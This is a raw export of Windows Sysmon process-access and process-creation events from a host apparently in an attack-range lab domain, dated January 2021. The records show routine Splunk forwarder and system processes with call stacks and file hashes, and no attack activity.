13:36:26.120{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.120{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:26.120{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.120{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EDA-6005-9900-00000000A301}4636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.120{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EDA-6005-9900-00000000A301}4636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.121{59A5CD1D-8EDA-6005-9900-00000000A301}4636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.980{59A5CD1D-8EDB-6005-9B00-00000000A301}48604788C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EDB-6005-9B00-00000000A301}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:27.824{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:27.824{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:27.824{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:27.824{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EDB-6005-9B00-00000000A301}4860C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EDB-6005-9B00-00000000A301}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8EDB-6005-9B00-00000000A301}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.308{59A5CD1D-8EDB-6005-9A00-00000000A301}48364796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EDB-6005-9A00-00000000A301}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:27.152{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:27.152{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:27.152{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 